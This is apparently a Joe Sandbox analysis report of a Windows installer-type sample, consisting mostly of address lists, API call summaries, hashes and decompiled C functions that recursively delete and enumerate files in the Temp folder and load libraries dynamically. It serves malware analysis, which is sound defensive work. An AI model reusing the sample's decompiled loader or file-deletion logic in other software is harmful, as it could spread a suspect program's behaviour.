                                                0x00000000
                                                0x73541fbc
                                                0x00000000
                                                0x00000000
                                                0x735421a6
                                                0x00000000
                                                0x00000000
                                                0x7354208b
                                                0x7354208d
                                                0x7354208d
                                                0x00000000
                                                0x00000000
                                                0x73542196
                                                0x00000000
                                                0x00000000
                                                0x7354219a
                                                0x00000000
                                                0x00000000
                                                0x735421a2
                                                0x00000000
                                                0x00000000
                                                0x735420d3
                                                0x735420d5
                                                0x735420d5
                                                0x00000000
                                                0x00000000
                                                0x7354209d
                                                0x7354209f
                                                0x7354209f
                                                0x00000000
                                                0x00000000
                                                0x735420af
                                                0x735420b1
                                                0x735420b1
                                                0x00000000
                                                0x00000000
                                                0x735420e1
                                                0x735420e3
                                                0x735420e3
                                                0x00000000
                                                0x00000000
                                                0x735420ba
                                                0x735420bc
                                                0x735420bc
                                                0x00000000
                                                0x00000000
                                                0x735420c1
                                                0x00000000
                                                0x00000000
                                                0x7354219e
                                                0x735421a8
                                                0x735421a8
                                                0x00000000
                                                0x00000000
                                                0x735420ec
                                                0x735420f0
                                                0x735420f5
                                                0x735420f8
                                                0x735420f9
                                                0x735420fc
                                                0x73542102
                                                0x73542102
                                                0x00000000
                                                0x00000000
                                                0x7354218e
                                                0x00000000
                                                0x00000000
                                                0x735420c5
                                                0x735420c7
                                                0x735420c7
                                                0x00000000
                                                0x00000000
                                                0x73541fc3
                                                0x73541fc3
                                                0x00000000
                                                0x00000000
                                                0x735420da
                                                0x735420dc
                                                0x735420dc
                                                0x00000000
                                                0x00000000
                                                0x73541f67
                                                0x73541f6d
                                                0x73541f70
                                                0x73541f72
                                                0x73541f72
                                                0x73541f75
                                                0x73541f79
                                                0x73541f86
                                                0x73541f88
                                                0x73541f8e
                                                0x73541f8e
                                                0x73541f8e
                                                0x00000000
                                                0x00000000
                                                0x7354208e
                                                0x7354208e
                                                0x73542090
                                                0x73542097
                                                0x00000000
                                                0x00000000
                                                0x735420d6
                                                0x735420d6
                                                0x00000000
                                                0x00000000
                                                0x735420a0
                                                0x735420a0
                                                0x735420a2
                                                0x735420a9
                                                0x00000000
                                                0x00000000
                                                0x735420b2
                                                0x735420b2
                                                0x735420b4
                                                0x00000000
                                                0x00000000
                                                0x735420e4
                                                0x735420e4
                                                0x00000000
                                                0x00000000
                                                0x735420bd
                                                0x735420bd
                                                0x00000000
                                                0x00000000
                                                0x7354210a
                                                0x7354210e
                                                0x73542113
                                                0x73542116
                                                0x00000000
                                                0x00000000
                                                0x735420c8
                                                0x735420c8
                                                0x735420cb
                                                0x735420cd
                                                0x00000000
                                                0x00000000
                                                0x735420dd
                                                0x735420dd
                                                0x735420e6
                                                0x735420e6
                                                0x73541fc5
                                                0x73541fc5
                                                0x73541fc8
                                                0x73541fcf
                                                0x73541fd1
                                                0x73541fd3
                                                0x73541fda
                                                0x73541fdd
                                                0x73541fe2
                                                0x73541fe4
                                                0x73541fe6
                                                0x73541fea
                                                0x73541ff0
                                                0x73541ff6
                                                0x73541ff6
                                                0x73541ff8
                                                0x73541ff8
                                                0x73541ff9
                                                0x73541ff9
                                                0x73541ffd
                                                0x73542003
                                                0x73542005
                                                0x73542009
                                                0x7354200e
                                                0x7354200e
                                                0x73542010
                                                0x73542010
                                                0x73542013
                                                0x73542016
                                                0x7354201f
                                                0x73542025
                                                0x73542028
                                                0x73542028
                                                0x7354202a
                                                0x7354202d
                                                0x73542033
                                                0x73542039
                                                0x73542039
                                                0x7354203b
                                                0x00000000
                                                0x00000000
                                                0x73542041
                                                0x73542041
                                                0x73542045
                                                0x7354204c
                                                0x73542070
                                                0x73542070
                                                0x73542074
                                                0x73542076
                                                0x73542079
                                                0x73542079
                                                0x7354207c
                                                0x7354207c
                                                0x00000000
                                                0x73542074
                                                0x73542051
                                                0x73542054
                                                0x73542054
                                                0x7354205b
                                                0x7354205d
                                                0x73542060
                                                0x73542067
                                                0x73542068
                                                0x7354206e
                                                0x7354206e
                                                0x00000000
                                                0x7354206e
                                                0x73542062
                                                0x73542065
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73542065
                                                0x73541ff2
                                                0x73541ff4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541f60
                                                0x73541e05
                                                0x73541e05
                                                0x73541e06
                                                0x73541f46
                                                0x00000000
                                                0x73541f46
                                                0x73541e0c
                                                0x73541e0d
                                                0x00000000
                                                0x00000000
                                                0x73541e13
                                                0x73541e16
                                                0x73541f0b
                                                0x73541f0b
                                                0x73541f0e
                                                0x73541f23
                                                0x73541f25
                                                0x73541f25
                                                0x73541f26
                                                0x73541f29
                                                0x73541f2c
                                                0x73541f38
                                                0x73541f38
                                                0x73541f38
                                                0x73541f2e
                                                0x73541f2e
                                                0x73541f2e
                                                0x73541f3e
                                                0x00000000
                                                0x73541f3e
                                                0x73541f10
                                                0x73541f10
                                                0x73541f11
                                                0x73541f1f
                                                0x00000000
                                                0x73541f1f
                                                0x73541f14
                                                0x73541f15
                                                0x00000000
                                                0x00000000
                                                0x73541f1b
                                                0x00000000
                                                0x73541f1b
                                                0x73541e1c
                                                0x73541f07
                                                0x00000000
                                                0x73541f07
                                                0x73541e22
                                                0x73541e22
                                                0x73541e25
                                                0x73541e4e
                                                0x00000000
                                                0x73541e4e
                                                0x73541e27
                                                0x73541e27
                                                0x73541e2a
                                                0x73541e44
                                                0x00000000
                                                0x73541e44
                                                0x73541e2c
                                                0x73541e2c
                                                0x73541e2f
                                                0x73541e3e
                                                0x00000000
                                                0x73541e3e
                                                0x73541e32
                                                0x73541e33
                                                0x00000000
                                                0x00000000
                                                0x73541e35
                                                0x00000000
                                                0x73541cec
                                                0x73541cec
                                                0x73541cef
                                                0x00000000
                                                0x73541cef
                                                0x73541ce6
                                                0x73541cd3
                                                0x73541cd8
                                                0x00000000
                                                0x00000000
                                                0x73541cda
                                                0x73541cdd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73541cdd
                                                0x73541c6d
                                                0x73541c70
                                                0x73541ca6
                                                0x73541ca9
                                                0x00000000
                                                0x73541caf
                                                0x73541cb1
                                                0x73541cb5
                                                0x73541cbc
                                                0x73541cc3
                                                0x73541cc6
                                                0x73541cc9
                                                0x00000000
                                                0x73541cc9
                                                0x73541ca9
                                                0x73541c72
                                                0x73541c73
                                                0x73541c8e
                                                0x73541c91
                                                0x00000000
                                                0x73541c97
                                                0x73541c97
                                                0x73541c9e
                                                0x73541ca1
                                                0x00000000
                                                0x73541ca1
                                                0x73541c91
                                                0x73541c78
                                                0x00000000
                                                0x73541c7e
                                                0x73541c7e
                                                0x73541c85
                                                0x00000000
                                                0x73541c85
                                                0x73541c78
                                                0x73541e74
                                                0x73541e79
                                                0x73541e7e
                                                0x73541e82
                                                0x73542355
                                                0x7354235b
                                                0x73541e94
                                                0x73541e96
                                                0x73541e97
                                                0x7354227e
                                                0x7354227e
                                                0x73542281
                                                0x73542284
                                                0x735422a1
                                                0x735422a7
                                                0x735422a9
                                                0x735422af
                                                0x735422c6
                                                0x735422c6
                                                0x735422c6
                                                0x735422d3
                                                0x735422d9
                                                0x735422dc
                                                0x735422e2
                                                0x735422e4
                                                0x735422e8
                                                0x735422ea
                                                0x735422f1
                                                0x735422f6
                                                0x735422f9
                                                0x735422fb
                                                0x73542300
                                                0x73542312
                                                0x73542312
                                                0x73542300
                                                0x735422f9
                                                0x735422e8
                                                0x73542318
                                                0x7354231b
                                                0x73542325
                                                0x7354232d
                                                0x7354233a
                                                0x73542340
                                                0x73542343
                                                0x73542273
                                                0x73542273
                                                0x00000000
                                                0x73542273
                                                0x73542349
                                                0x7354234f
                                                0x7354234f
                                                0x00000000
                                                0x00000000
                                                0x73542351
                                                0x73542351
                                                0x73542351
                                                0x73542351
                                                0x00000000
                                                0x7354231d
                                                0x7354231d
                                                0x73542323
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x73542323
                                                0x7354231b
                                                0x735422b2
                                                0x735422b8
                                                0x735422ba
                                                0x735422c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x735422c0
                                                0x73542286
                                                0x7354228d
                                                0x73542293
                                                0x73542299
                                                0x00000000
                                                0x73542299
                                                0x73541e9d
                                                0x73541e9e
                                                0x7354225d
                                                0x7354225d
                                                0x73542263
                                                0x73542266
                                                0x00000000
                                                0x00000000
                                                0x7354226d
                                                0x73542272
                                                0x00000000
                                                0x73542272
                                                0x73541ea5
                                                0x00000000
                                                0x00000000
                                                0x73541eab
                                                0x73541eab
                                                0x73541eb4
                                                0x73541eb9
                                                0x73541ebf
                                                0x00000000
                                                0x00000000
                                                0x73541ec5
                                                0x73541ed2
                                                0x73541ed8
                                                0x73541ee2
                                                0x73541ee8
                                                0x73541ef0
                                                0x73541f00
                                                0x00000000
                                                0x73541f00

                                                APIs
                                                  • Part of subcall function 735412BB: GlobalAlloc.KERNEL32(00000040,?,735412DB,?,7354137F,00000019,735411CA,-000000A0), ref: 735412C5
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73541D2D
                                                • lstrcpyW.KERNEL32 ref: 73541D75
                                                • lstrcpyW.KERNEL32 ref: 73541D7F
                                                • GlobalFree.KERNEL32 ref: 73541D92
                                                • GlobalFree.KERNEL32 ref: 73541E74
                                                • GlobalFree.KERNEL32 ref: 73541E79
                                                • GlobalFree.KERNEL32 ref: 73541E7E
                                                • GlobalFree.KERNEL32 ref: 73542068
                                                • lstrcpyW.KERNEL32 ref: 73542222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 735422A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 735422B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 7354230C
                                                • lstrlenW.KERNEL32(00000808), ref: 73542326
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.896849351.0000000073541000.00000020.00000001.01000000.00000004.sdmp, Offset: 73540000, based on PE: true
                                                • Associated: 00000000.00000002.896815263.0000000073540000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896857446.0000000073544000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000000.00000002.896866612.0000000073546000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73540000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID: Nv@hv
                                                • API String ID: 245916457-4226514844
                                                • Opcode ID: 63ac97992912a64eda41442651158ef0ee2c636a2f2afaf5350eb81567a91d80
                                                • Instruction ID: 47660a5f1b6f611fe871ef36c51b4e246c16074e3f9984c71e27959fb189f4cc
                                                • Opcode Fuzzy Hash: 63ac97992912a64eda41442651158ef0ee2c636a2f2afaf5350eb81567a91d80
                                                • Instruction Fuzzy Hash: 6622BD71D04319DBDB19DFA4E9807EDBBF4FB04305F24692ED16AE6280E7709A81CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 664 405c49-405c6f call 405f14 667 405c71-405c83 DeleteFileW 664->667 668 405c88-405c8f 664->668 669 405e05-405e09 667->669 670 405c91-405c93 668->670 671 405ca2-405cb2 call 40653d 668->671 672 405db3-405db8 670->672 673 405c99-405c9c 670->673 677 405cc1-405cc2 call 405e58 671->677 678 405cb4-405cbf lstrcatW 671->678 672->669 676 405dba-405dbd 672->676 673->671 673->672 679 405dc7-405dcf call 406873 676->679 680 405dbf-405dc5 676->680 681 405cc7-405ccb 677->681 678->681 679->669 687 405dd1-405de5 call 405e0c call 405c01 679->687 680->669 685 405cd7-405cdd lstrcatW 681->685 686 405ccd-405cd5 681->686 688 405ce2-405cfe lstrlenW FindFirstFileW 685->688 686->685 686->688 704 405de7-405dea 687->704 705 405dfd-405e00 call 40559f 687->705 689 405d04-405d0c 688->689 690 405da8-405dac 688->690 692 405d2c-405d40 call 40653d 689->692 693 405d0e-405d16 689->693 690->672 695 405dae 690->695 706 405d42-405d4a 692->706 707 405d57-405d62 call 405c01 692->707 696 405d18-405d20 693->696 697 405d8b-405d9b FindNextFileW 693->697 695->672 696->692 700 405d22-405d2a 696->700 697->689 703 405da1-405da2 FindClose 697->703 700->692 700->697 703->690 704->680 708 405dec-405dfb call 40559f call 4062fd 704->708 705->669 706->697 709 405d4c-405d55 call 405c49 706->709 717 405d83-405d86 call 40559f 707->717 718 405d64-405d67 707->718 708->669 709->697 717->697 721 405d69-405d79 call 40559f call 4062fd 718->721 722 405d7b-405d81 718->722 721->697 722->697
                                                C-Code - Quality: 98%
                                                			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				short _v556;
                                                				short _v558;
                                                				struct _WIN32_FIND_DATAW _v604;
                                                				signed int _t38;
                                                				signed int _t52;
                                                				signed int _t55;
                                                				signed int _t62;
                                                				void* _t64;
                                                				signed char _t65;
                                                				WCHAR* _t66;
                                                				void* _t67;
                                                				WCHAR* _t68;
                                                				void* _t70;
                                                
                                                				_t65 = _a8;
                                                				_t68 = _a4;
                                                				_v8 = _t65 & 0x00000004;
                                                				_t38 = E00405F14(__eflags, _t68);
                                                				_v12 = _t38;
                                                				if((_t65 & 0x00000008) != 0) {
                                                					_t62 = DeleteFileW(_t68); // executed
                                                					asm("sbb eax, eax");
                                                					_t64 =  ~_t62 + 1;
                                                					 *0x434f88 =  *0x434f88 + _t64;
                                                					return _t64;
                                                				}
                                                				_a4 = _t65;
                                                				_t8 =  &_a4;
                                                				 *_t8 = _a4 & 0x00000001;
                                                				__eflags =  *_t8;
                                                				if( *_t8 == 0) {
                                                					L5:
                                                					E0040653D(0x42f270, _t68);
                                                					__eflags = _a4;
                                                					if(_a4 == 0) {
                                                						E00405E58(_t68);
                                                					} else {
                                                						lstrcatW(0x42f270, L"\\*.*");
                                                					}
                                                					__eflags =  *_t68;
                                                					if( *_t68 != 0) {
                                                						L10:
                                                						lstrcatW(_t68, 0x40a014);
                                                						L11:
                                                						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                						_t38 = FindFirstFileW(0x42f270,  &_v604); // executed
                                                						_t70 = _t38;
                                                						__eflags = _t70 - 0xffffffff;
                                                						if(_t70 == 0xffffffff) {
                                                							L26:
                                                							__eflags = _a4;
                                                							if(_a4 != 0) {
                                                								_t30 = _t66 - 2;
                                                								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                								__eflags =  *_t30;
                                                							}
                                                							goto L28;
                                                						} else {
                                                							goto L12;
                                                						}
                                                						do {
                                                							L12:
                                                							__eflags = _v604.cFileName - 0x2e;
                                                							if(_v604.cFileName != 0x2e) {
                                                								L16:
                                                								E0040653D(_t66,  &(_v604.cFileName));
                                                								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                								if(__eflags == 0) {
                                                									_t52 = E00405C01(__eflags, _t68, _v8);
                                                									__eflags = _t52;
                                                									if(_t52 != 0) {
                                                										E0040559F(0xfffffff2, _t68);
                                                									} else {
                                                										__eflags = _v8 - _t52;
                                                										if(_v8 == _t52) {
                                                											 *0x434f88 =  *0x434f88 + 1;
                                                										} else {
                                                											E0040559F(0xfffffff1, _t68);
                                                											E004062FD(_t67, _t68, 0);
                                                										}
                                                									}
                                                								} else {
                                                									__eflags = (_a8 & 0x00000003) - 3;
                                                									if(__eflags == 0) {
                                                										E00405C49(__eflags, _t68, _a8);
                                                									}
                                                								}
                                                								goto L24;
                                                							}
                                                							__eflags = _v558;
                                                							if(_v558 == 0) {
                                                								goto L24;
                                                							}
                                                							__eflags = _v558 - 0x2e;
                                                							if(_v558 != 0x2e) {
                                                								goto L16;
                                                							}
                                                							__eflags = _v556;
                                                							if(_v556 == 0) {
                                                								goto L24;
                                                							}
                                                							goto L16;
                                                							L24:
                                                							_t55 = FindNextFileW(_t70,  &_v604);
                                                							__eflags = _t55;
                                                						} while (_t55 != 0);
                                                						_t38 = FindClose(_t70);
                                                						goto L26;
                                                					}
                                                					__eflags =  *0x42f270 - 0x5c;
                                                					if( *0x42f270 != 0x5c) {
                                                						goto L11;
                                                					}
                                                					goto L10;
                                                				} else {
                                                					__eflags = _t38;
                                                					if(_t38 == 0) {
                                                						L28:
                                                						__eflags = _a4;
                                                						if(_a4 == 0) {
                                                							L36:
                                                							return _t38;
                                                						}
                                                						__eflags = _v12;
                                                						if(_v12 != 0) {
                                                							_t38 = E00406873(_t68);
                                                							__eflags = _t38;
                                                							if(_t38 == 0) {
                                                								goto L36;
                                                							}
                                                							E00405E0C(_t68);
                                                							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                                                							__eflags = _t38;
                                                							if(_t38 != 0) {
                                                								return E0040559F(0xffffffe5, _t68);
                                                							}
                                                							__eflags = _v8;
                                                							if(_v8 == 0) {
                                                								goto L30;
                                                							}
                                                							E0040559F(0xfffffff1, _t68);
                                                							return E004062FD(_t67, _t68, 0);
                                                						}
                                                						L30:
                                                						 *0x434f88 =  *0x434f88 + 1;
                                                						return _t38;
                                                					}
                                                					__eflags = _t65 & 0x00000002;
                                                					if((_t65 & 0x00000002) == 0) {
                                                						goto L28;
                                                					}
                                                					goto L5;
                                                				}
                                                			}


















                                                0x00405c53
                                                0x00405c58
                                                0x00405c61
                                                0x00405c64
                                                0x00405c6c
                                                0x00405c6f
                                                0x00405c72
                                                0x00405c7a
                                                0x00405c7c
                                                0x00405c7d
                                                0x00000000
                                                0x00405c7d
                                                0x00405c88
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8b
                                                0x00405c8f
                                                0x00405ca2
                                                0x00405ca9
                                                0x00405cae
                                                0x00405cb2
                                                0x00405cc2
                                                0x00405cb4
                                                0x00405cba
                                                0x00405cba
                                                0x00405cc7
                                                0x00405ccb
                                                0x00405cd7
                                                0x00405cdd
                                                0x00405ce2
                                                0x00405ce8
                                                0x00405cf3
                                                0x00405cf9
                                                0x00405cfb
                                                0x00405cfe
                                                0x00405da8
                                                0x00405da8
                                                0x00405dac
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00405dae
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d04
                                                0x00405d04
                                                0x00405d04
                                                0x00405d0c
                                                0x00405d2c
                                                0x00405d34
                                                0x00405d39
                                                0x00405d40
                                                0x00405d5b
                                                0x00405d60
                                                0x00405d62
                                                0x00405d86
                                                0x00405d64
                                                0x00405d64
                                                0x00405d67
                                                0x00405d7b
                                                0x00405d69
                                                0x00405d6c
                                                0x00405d74
                                                0x00405d74
                                                0x00405d67
                                                0x00405d42
                                                0x00405d48
                                                0x00405d4a
                                                0x00405d50
                                                0x00405d50
                                                0x00405d4a
                                                0x00000000
                                                0x00405d40
                                                0x00405d0e
                                                0x00405d16
                                                0x00000000
                                                0x00000000
                                                0x00405d18
                                                0x00405d20
                                                0x00000000
                                                0x00000000
                                                0x00405d22
                                                0x00405d2a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d8b
                                                0x00405d93
                                                0x00405d99
                                                0x00405d99
                                                0x00405da2
                                                0x00000000
                                                0x00405da2
                                                0x00405ccd
                                                0x00405cd5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c91
                                                0x00405c91
                                                0x00405c93
                                                0x00405db3
                                                0x00405db5
                                                0x00405db8
                                                0x00405e09
                                                0x00405e09
                                                0x00405e09
                                                0x00405dba
                                                0x00405dbd
                                                0x00405dc8
                                                0x00405dcd
                                                0x00405dcf
                                                0x00000000
                                                0x00000000
                                                0x00405dd2
                                                0x00405dde
                                                0x00405de3
                                                0x00405de5
                                                0x00000000
                                                0x00405e00
                                                0x00405de7
                                                0x00405dea
                                                0x00000000
                                                0x00000000
                                                0x00405def
                                                0x00000000
                                                0x00405df6
                                                0x00405dbf
                                                0x00405dbf
                                                0x00000000
                                                0x00405dbf
                                                0x00405c99
                                                0x00405c9c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c9c

                                                APIs
                                                • DeleteFileW.KERNEL32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Borders.dat,\*.*), ref: 00405CBA
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                • FindFirstFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Borders.dat,?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Borders.dat$\*.*
                                                • API String ID: 2035342205-4273749210
                                                • Opcode ID: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                • Opcode Fuzzy Hash: 91e5555b9508150fcf6e55f7c9d4dc2ae8152fc7335161658e002f7252bbf59f
                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406873(WCHAR* _a4) {
                                                				void* _t2;
                                                
                                                				_t2 = FindFirstFileW(_a4, 0x4302b8); // executed
                                                				if(_t2 == 0xffffffff) {
                                                					return 0;
                                                				}
                                                				FindClose(_t2);
                                                				return 0x4302b8;
                                                			}




                                                0x0040687e
                                                0x00406887
                                                0x00000000
                                                0x00406894
                                                0x0040688a
                                                0x00000000

                                                APIs
                                                • FindFirstFileW.KERNEL32(76F1FAA0,004302B8,C:\,00405F5D,C:\,C:\,00000000,C:\,C:\,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                • FindClose.KERNEL32(00000000), ref: 0040688A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\
                                                • API String ID: 2295610775-3404278061
                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t8;
                                                				void* _t21;
                                                
                                                				_t8 = FindFirstFileW(E00402DA6(2), _t21 - 0x2dc); // executed
                                                				if(_t8 != 0xffffffff) {
                                                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E0040653D();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}





                                                0x0040291a
                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                • Opcode Fuzzy Hash: 2616af6840be9ad065c7271e10669628003eadbae38ac98b1b8d582da80c65e5
                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
